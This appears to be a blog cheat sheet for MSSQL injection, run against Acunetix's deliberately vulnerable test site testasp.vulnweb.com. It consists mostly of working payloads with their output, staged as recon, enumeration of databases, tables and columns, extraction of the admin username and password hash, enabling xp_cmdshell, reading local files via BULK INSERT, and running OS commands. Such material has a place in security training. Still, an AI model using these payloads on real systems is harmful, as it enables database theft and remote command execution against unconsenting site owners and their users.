MSSQL Injection
(((0x1 :- Basic Recon Stage)))
-1 union all select 1,2–
-1 union all select null,2–
null union all select 1,null–
1 union all select 1,null–
null union all select @@version,2–
null union all select schema_name,2 from information_schema.schemata–
-1 UNION SELECT table_name,2 FROM information_schema.tables–
null UNION SELECT column_name,2 FROM information_schema.columns WHERE table_name=’users’–
-1+UNION+SELECT upass,2 FROM users where uname=’admin’–
UserName
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,user_name())–
acunetix
Check if Website is Vulnerable
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=1–%5BTrue%5D
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=2–%5BFalse%5D
SQL Server Version
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select @@version))–
Microsoft SQL Server 2005 – 9.00.3042.00 (Intel X86) Feb 9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
Server Name
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select @@servername))–
VPS19760
(((0x2 :- Enumerating Other Databases)))
[Listing Database Names]
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(1)))–
master
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(2)))–
tempdb
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(3)))–
model
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(4)))–
msdb
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(5)))–
acublog
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(6)))–
acuforum
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(7)))–
acuservice
(((0x3 :- Enumerating Table Names for each database)))
[*]Database : [master]
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM master..sysobjects WHERE xtype = ‘U’ ),NULL–
spt_fallback_db
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM master..sysobjects WHERE xtype = ‘U’ AND name not in (‘spt_fallback_db’) ),NULL–
spt_fallback_dev
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM master..sysobjects WHERE xtype = ‘U’ AND name not in (‘spt_fallback_db’,’spt_fallback_dev’) ),NULL–
spt_fallback_usg
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM master..sysobjects WHERE xtype = ‘U’ AND name not in (‘spt_fallback_db’,’spt_fallback_dev’,’spt_fallback_usg’) ),NULL–
spt_monitor
Same Goes On….
[*]Database : [acublog]
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acublog..sysobjects WHERE xtype = ‘U’ ),NULL–
comments
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acublog..sysobjects WHERE xtype = ‘U’ AND name not in (‘comments’) ),NULL–
news
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acublog..sysobjects WHERE xtype = ‘U’ AND name not in (‘comments’,’news’) ),NULL–
users
[*]Database : [acuforum]
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acuforum..sysobjects WHERE xtype = ‘U’ ),NULL–
[*]Database : [acuservice]
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acuservice..sysobjects WHERE xtype = ‘U’ ),NULL–
threads
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acuforum..sysobjects WHERE xtype = ‘U’ AND name not in (‘threads’)),NULL–
users
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acuforum..sysobjects WHERE xtype = ‘U’ AND name not in (‘threads’,’users’)),NULL–
forums
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acuforum..sysobjects WHERE xtype = ‘U’ AND name not in (‘threads’,’users’,’forums’)),NULL–
posts
Same…
0x4 :- Fetching Column Name for Tables from Same and other database
Database : [acublog]
AND acublog..syscolumns.name NOT IN (‘uname’) ))
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select top 1 acublog..syscolumns.name FROM acublog..syscolumns, acublog..sysobjects WHERE acublog..syscolumns.id=acublog..sysobjects.id AND acublog..sysobjects.name=’users’–
uname
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select top 1 acublog..syscolumns.name FROM acublog..syscolumns, acublog..sysobjects WHERE acublog..syscolumns.id=acublog..sysobjects.id AND acublog..sysobjects.name=’users’ AND acublog..syscolumns.name NOT IN (‘uname’) ))–
upass
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select top 1 acublog..syscolumns.name FROM acublog..syscolumns, acublog..sysobjects WHERE acublog..syscolumns.id=acublog..sysobjects.id AND acublog..sysobjects.name=’users’ AND acublog..syscolumns.name NOT IN (‘uname’,’upass’) ))–
alevel
Same Ways for other queries..
0x5:- Fetching Data from Columns
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 union all select uname,null from acublog.dbo.users;
admin
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 union all select upass,null from acublog.dbo.users;
334c4a4c42fdb79d7ebc3e73b517e6f8
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 union all select uname,null from acublog.dbo.users WHERE uname NOT IN (‘admin’);
[For now Not true but can be used if there are more rows to fetch]
(((0x4 :- Enable xp_cmdshell if current_user is ‘sa’ )))
For strting:
http://testasp.vulnweb.com/showforum.asp?name=test’; EXEC sp_configure ‘show advanced options’,1 ; RECONFIGURE ; EXEC sp_configure ‘xp_cmdshell’,1 ; RECONFIGURE ;–
For integer:
http://testasp.vulnweb.com/showforum.asp?id=0; EXEC sp_configure ‘show advanced options’,1 ; RECONFIGURE ; EXEC sp_configure ‘xp_cmdshell’,1 ; RECONFIGURE ;–
(((0x5 :- Reading Local File and insert into Table )))
CREATE TABLE mydata (line varchar(8000));
BULK INSERT mydata FROM ‘C:\output.txt’;
DROP TABLE mydata;
(((0x6 :- Execute Command shell )))
‘; exec xp_cmdshell ‘net user > c:\output.txt’;–
Recent Comments